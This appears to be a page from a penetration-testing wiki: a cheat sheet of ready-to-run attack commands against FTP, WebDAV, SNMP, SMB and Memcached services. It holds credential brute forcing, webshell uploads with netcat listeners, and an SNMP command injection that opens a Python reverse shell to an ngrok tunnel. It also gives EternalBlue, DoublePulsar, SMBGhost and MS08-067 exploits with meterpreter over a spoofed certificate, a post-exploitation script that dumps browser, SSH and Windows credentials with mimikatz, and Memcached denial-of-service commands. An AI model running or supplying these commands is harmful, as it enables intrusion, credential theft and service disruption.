Network Configuration

Check List

Cheat Sheet

FTP

Nmap

Identify FTP

nmap -p 21 -sS -sV --mtu 5000 --script banner $WEBSITE

Anonymous Login

nmap -p 21 -sS -sV --mtu 5000 --script ftp-anon $WEBSITE

Brute Force

nmap -p 21 -sS -sV --mtu 5000 --script ftp-brute $WEBSITE

Browser Login

ftp://anonymous:anonymous@$TARGET

WGET

Download Files

wget --ftp-user=anonymous --ftp-password=anonymous ftp://$TARGET:21

FTP

CLI Login

ftp
open $TARGET 21

USER

> anonymous

PASS

> anonymous

FTP Mode

passive

Download File

get file.txt

Hydra

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt ftp://$TARGET:21

Metasploit

Recon Version

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_version;
    set RHOSTS $WEBSITE;
    run;
    exit"

Anonymous Login

msfconsole -qx "
    use auxiliary/scanner/ftp/anonymous;
    set RHOSTS $WEBSITE;
    run;
    exit"

Brute Force

msfconsole -qx "
    use auxiliary/scanner/ftp/ftp_login;
    set RHOSTS $WEBSITE;
    set USERPASS_FILE /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt;
    run;
    exit"

WebDAV

Nmap

Identify WebDAV

nmap -p 80,443 \
     -sS -sV --mtu 5000 \
     --script http-methods,http-webdav-scan $WEBSITE

Metasploit

Scan WebDAV

msfconsole -qx "
    use auxiliary/scanner/http/webdav_scanner;
    set PATH /webdav;
    set RHOSTS $WEBSITE;
    exit"

Hydra

Brute Force

hydra -V \
      -L /usr/share/seclists/Usernames/sap-default-usernames.txt \
      -P /usr/share/seclists/Passwords/darkweb2017-top10000.txt \
      $TARGET http-get /webdav/

DavTest

Scan WebDAV

davtest -url $WEBSITE

Upload Shell

davtest -url $WEBSITE \
        -uploadfile /usr/share/webshells/php/php-reverse-shell.php \
        -uploadloc shell.php

Listening

nc -lvnp 1234

Cadaver

cadaver $WEBSITE/webdav

PUT Web shell

put /usr/share/webshells/php/php-reverse-shell.php

Listening

nc -lvnp 1234

SNMP

Nmap

Identify SNMP

nmap -p 161 -sU -sV --mtu 5000 --script snmp-info $WEBSITE

Brute Force

nmap -p 161 -sU -sV --mtu 5000 --script snmp-brute $WEBSITE

SNMPWalk

Enumerate SNMP Public

snmpwalk -v1 -c public $TARGET

Onesixtyone

Enumerate SNMP Public

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt $TARGET

SNMPSet

SNMPv1

snmpset -v1 -c private $TARGET OID s "unk9vvn"

SNMPv2

snmpset -v2c -c private $TARGET sysName.0 s "unk9vvn"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Inject RCE

snmpset -m +NET-SNMP-EXTEND-MIB \
        -v 2c \
        -c SuP3RPrivCom90 $TARGET 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"$NGHOST\",443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'

Execute Command

snmpwalk -v2c -c SuP3RPrivCom90 $TARGET NET-SNMP-EXTEND-MIB::nsExtendObjects

Metasploit

Enumerate SNMP Public

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate SNMP Private

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enum;
    set RHOSTS $WEBSITE;
    set COMMUNITY private;
    run;
    exit"

Enumerate Windows Users

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumusers;
    set RHOSTS $WEBSITE;
    run;
    exit"

Enumerate File Shares

msfconsole -qx "
    use auxiliary/scanner/snmp/snmp_enumshares;
    set RHOSTS $WEBSITE;
    run;
    exit"

SMB

Nmap

Identify SMB

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-protocols,smb-os-discovery,smb2-capabilities $WEBSITE

Recon Vulns

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-vuln-*,smb-double-pulsar-backdoor $WEBSITE

Brute Force

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-brute $WEBSITE

Enumerate Users and Shares

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-users,smb-enum-shares $WEBSITE

Enumerate Domains and Groups

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-domains,smb-enum-groups $WEBSITE

Enumerate Services and Processes

nmap -p 139,445 \
     -sS -sV --mtu 5000 \
     --script smb-enum-services,smb-enum-processes $WEBSITE

netexec

Enum Host

netexec smb $TARGET

enum4linux

Enumerate Shares

enum4linux -a $TARGET

nbtscan

Enumerate Shares

nbtscan -r $TARGET/24

smbclient

User Enumeration and Null Sessions

smbclient -N -L //$TARGET

rpcclient

User Enumeration and Null Sessions

rpcclient -U "" $TARGET

Metasploit

Detect Version

msfconsole -qx "
    use auxiliary/scanner/smb/smb_version;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Users

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumusers;
    set RHOSTS $TARGET;
    run;
    exit"

Enumerate Shares

msfconsole -qx "
    use auxiliary/scanner/smb/smb_enumshares;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Dumps

msfconsole -qx "
    use auxiliary/scanner/smb/impacket/secretsdump;
    set RHOSTS $TARGET;
    run;
    exit"

Credential Brute Force

msfconsole -qx "
    use auxiliary/scanner/smb/smb_login;
    set RHOSTS $TARGET;
    set SMBUser Administrator;
    set PASS_FILE /usr/share/seclists/Passwords/darkweb2017-top100.txt;
    run;
    exit"

Detect EternalBlue

msfconsole -qx "
    use auxiliary/scanner/smb/smb_ms17_010;
    set RHOSTS $TARGET;
    run;
    exit"

Start Ngrok

ngrok http 4444 >/dev/null 2>&1 &

Define ENV Ngrok

NGHOST=$(curl -s http://127.0.0.1:4040/api/tunnels | jq -r .tunnels[0].public_url | sed 's|https://||')

Cert Spoof

rm -rf /home/$USER/.msf4/loot/*
msfconsole -qx "
    use auxiliary/gather/impersonate_ssl;
    set RHOSTS google.com;
    run;
    exit"

Define ENV Cert

CERT=/home/$USER/.msf4/loot/$(find /home/$USER/.msf4/loot/ -type f -name "*.pem" -printf "%f\n" | head -n 1)

Post-EXP

cat > /tmp/post-exp.rc << EOF
getprivs
getsystem
run multi/gather/firefox_creds DECRYPT=true
run multi/gather/filezilla_client_cred
run multi/gather/ssh_creds
run multi/gather/thunderbird_creds
run multi/gather/wlan_geolocate
mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
bg
EOF

EternalBlue Exploit (ÙŒWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/ms17_010_eternalblue;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Doublepulsar Exploit (ÙŒWin 7 to 10 - Win Server 2008 to 2012)

msfconsole -qx "
    use exploit/windows/smb/smb_doublepulsar_rce;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

SMBGhost Exploit (Win 10)

msfconsole -qx "
    use exploit/windows/smb/cve_2020_0796_smbghost;
    set PAYLOAD windows/x64/meterpreter/reverse_https;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Net API Exploit (Win XP's)

msfconsole -qx "
    use exploit/windows/smb/ms08_067_netapi;
    set PAYLOAD windows/meterpreter/reverse_hop_http;
    set RHOSTS $TARGET;
    set LHOST $NGHOST;
    set LPORT 443;
    set ReverseListenerBindAddress 127.0.0.1;
    set ReverseListenerBindPort 4444;
    set HandlerSSLCert $CERT;
    set StagerVerifySSLCert true;
    set StageEncoder true;
    set AutoRunScript /tmp/post-exp.rc;
    run -j"

Memcached

Nmap

Identify Memcached

nmap -p 11211 -sS -sV --mtu 5000 --script memcached-info $WEBSITE

Netcat

Get Version

echo "version" | nc -vn -w 1 $TARGET 11211

Get Status

echo "stats" | nc -vn -w 1 $TARGET 11211

Get Slabs

echo "stats slabs" | nc -vn -w 1 $TARGET 11211

Get Items

echo "stats items" | nc -vn -w 1 $TARGET 11211

Get Key Names

echo "stats cachedump 1 10" | nc -vn -w 1 $TARGET 11211

Get Info Saved

echo "get $ITEM" | nc -vn -w 1 $TARGET 11211

Denial of Service

for i in {1..10000}; do echo "set key$i 0 0 1024" | nc $TARGET 11211; done

DDoS Amplification

echo -e "\x00\x00\x00\x00\x00\x01\x00\x00stats\n" | nc -u -q 1 $TARGET 11211

libmemcached-tools

Get Stats

memcstat --servers=$TARGET

Get all items

memcdump --servers=$TARGET

Get info inside the item(s)

memccat --servers=$TARGET $ITEM1 $ITEM2 $ITEM3

Metasploit

Extract Slabs

msfconsole -qx "use auxiliary/gather/memcached_extractor;set RHOSTS $TARGET;run;exit"

Denial of Service

msfconsole -qx "use auxiliary/dos/misc/memcached;set RHOSTS $TARGET;run;exit"
PreviousMisconfigurationNextApp Platform Configuration

Last updated

Was this helpful?